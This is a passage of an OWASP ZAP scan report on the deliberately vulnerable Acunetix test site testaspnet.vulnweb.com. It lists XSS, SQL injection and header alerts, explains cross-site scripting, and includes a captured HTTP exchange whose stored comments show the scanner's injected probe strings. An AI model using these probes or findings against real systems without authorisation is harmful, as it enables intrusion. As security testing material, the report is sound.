ZAP Scanning Report

Generated with ZAP on 周一 25 7月 2022, at 21:33:02

Contents

About this report

Report parameters

Contexts

No contexts were selected, so all contexts were included by default.

Sites

The following sites were included:

  • http://testaspnet.vulnweb.com

(If no sites were selected, all sites were included by default.)

An included site must also be within one of the included contexts for its data to be included in the report.

Risk levels

Included: 高等的, 中等的, , Informational

Excluded: None

Confidence levels

Included: User Confirmed, 高等的, 中等的,

Excluded: User Confirmed, 高等的, 中等的, , 假阳性

Summaries

Alert counts by risk and confidence

This table shows the number of alerts for each level of risk and confidence included in the report.

(The percentages in brackets represent the count as a percentage of the total number of alerts included in the report, rounded to one decimal place.)

Confidence
User Confirmed 高等的 中等的 Total
Risk 高等的 0
(0.0%)
0
(0.0%)
6
(3.3%)
15
(8.2%)
21
(11.5%)
中等的 0
(0.0%)
0
(0.0%)
26
(14.2%)
0
(0.0%)
26
(14.2%)
0
(0.0%)
29
(15.8%)
99
(54.1%)
4
(2.2%)
132
(72.1%)
Informational 0
(0.0%)
0
(0.0%)
0
(0.0%)
4
(2.2%)
4
(2.2%)
Total 0
(0.0%)
29
(15.8%)
131
(71.6%)
23
(12.6%)
183
(100%)

Alert counts by site and risk

This table shows, for each site for which one or more alerts were raised, the number of alerts raised at each risk level.

Alerts with a confidence level of "False Positive" have been excluded from these counts.

(The numbers in brackets are the number of alerts raised for the site at or above that risk level.)

Risk
高等的
(= 高等的)
中等的
(>= 中等的)

(>= 低)
Informational
(>= Informational)
Site http://testaspnet.vulnweb.com 21
(21)
26
(47)
132
(179)
4
(183)

Alert counts by alert type

This table shows the number of alerts of each alert type, together with the alert type's risk level.

(The percentages in brackets represent each count as a percentage, rounded to one decimal place, of the total number of alerts included in this report.)

Alert type Risk Count
Cross Site Scripting (Persistent) 高等的 1
(0.5%)
Cross Site Scripting (Reflected) 高等的 3
(1.6%)
SQL Injection 高等的 2
(1.1%)
Viewstate without MAC Signature (Unsure) 高等的 15
(8.2%)
X-Frame-Options Header Not Set 中等的 26
(14.2%)
Cookie without SameSite Attribute 2
(1.1%)
Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) 38
(20.8%)
Timestamp Disclosure - Unix 4
(2.2%)
X-AspNet-Version Response Header 29
(15.8%)
X-Content-Type-Options Header Missing 34
(18.6%)
缺少反CSRF令牌 25
(13.7%)
字符集不匹配 (Header Versus Meta Content-Type Charset) Informational 4
(2.2%)
Total 183

Alerts

  1. Risk=高等的, Confidence=中等的 (6)

    1. http://testaspnet.vulnweb.com (6)

      1. Cross Site Scripting (Persistent) (1)
        1. GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

          When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

          There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

          Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

          Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

          Other info

          Source URL: http://testaspnet.vulnweb.com/Comments.aspx?id=2

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          Content-Length: 0
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:07:41 GMT
          Content-Length: 35389
          
          
          Response body (35389 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgoCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kAgkPZBYCAgEPZBaCAmYPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIBD2QWAmYPFgIeBWNsYXNzBQdDb21tZW50ZAICD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIDD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCBA9kFgJmDxYCHwMFB0NvbW1lbnRkAgUPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAgYPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIH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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLwoL2oCgKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8k7r0hE7xuM6hcVBvJF3jZU0DvVQ==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a>
          						<DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:36 PM</DIV><DIV class="CommentText">3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http:\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https:\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">//3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTp://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTpS://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:29 PM</DIV><DIV class="CommentText">zApPX3sS</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText">0W45pz4p</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
